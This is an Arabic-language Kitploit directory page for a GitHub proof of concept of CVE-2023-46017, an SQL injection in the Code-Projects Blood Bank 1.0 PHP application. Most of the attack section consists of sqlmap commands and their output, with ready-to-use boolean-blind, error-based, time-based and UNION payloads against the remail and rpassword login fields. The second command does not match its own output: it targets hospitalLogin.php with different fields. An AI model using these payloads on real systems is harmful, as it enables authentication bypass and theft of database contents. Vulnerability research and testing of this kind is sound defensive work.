Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability — إثبات مفهوم لاستغلال ثغرة حقن SQL في نظام Blood Bank V1.0 من Code-Projects. يوضح تجاوز المصادقة واستخراج قاعدة البيانات عبر المعاملات الضعيفة remail و rpassword في receiverLogin.php. | Kitploit
أدوات/GitHubGitHub/ersinerenler/cve-2023-46017-code-projects-blood-bank-1.0-sql-injection-vulnerability
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubersinerenler/cve-2023-46017-code-projects-blood-bank-1.0-sql-injection-vulnerability

CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

إثبات مفهوم لاستغلال ثغرة حقن SQL في نظام Blood Bank V1.0 من Code-Projects. يوضح تجاوز المصادقة واستخراج قاعدة البيانات عبر المعاملات الضعيفة remail و rpassword في receiverLogin.php.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

CVE-2023-46017-Code-Projects-Blood-Bank-1.0-ثغرة-حقن-SQL

  • مؤلف الاستغلال: ersinerenler

الصفحة الرئيسية للبائع

  • https://code-projects.org/blood-bank-in-php-with-source-code

رابط البرنامج

  • https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip

نظرة عامة

  • بنك الدم Code-Projects الإصدار V1.0 عرضة لثغرة أمنية كبيرة تنشأ من عدم كفاية الحماية على وسيطي 'remail' و 'rpassword' في ملف receiverLogin.php. يمكن استغلال هذا الخلل لحقن استعلامات SQL ضارة، مما يؤدي إلى وصول غير مصرح به واستخراج معلومات حساسة من قاعدة البيانات.

تفاصيل الثغرة

  • CVE ID: CVE-2023-46017
  • الإصدار المتأثر: بنك الدم V1.0
  • الملف المعرض للخطر: /receiverLogin.php
  • أسماء الوسائط: remail, rpassword
  • نوع الهجوم: محلي

المراجع

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46017
  • https://nvd.nist.gov/vuln/detail/CVE-2023-46017

الوصف

  • يؤدي عدم وجود التحقق المناسب من المدخلات وتنقيتها على وسيطي 'remail' و 'rpassword' إلى تمكين المهاجم من صياغة استعلامات حقن SQL، متجاوزًا آليات المصادقة والحصول على وصول غير مصرح به إلى قاعدة البيانات
صورة

إثبات المفهوم (PoC) :

  • sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p remail --risk 3 --level 5 --dbms mysql --batch --current-db
root@kitploit:~
---
Parameter: remail (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login
---
  • sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p rpassword --risk 3 --level 3 --dbms mysql --batch --current-db
root@kitploit:~
---
Parameter: rpassword (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login
---
  • قاعدة البيانات الحالية: bloodbank
صورة
تنزيل الأداة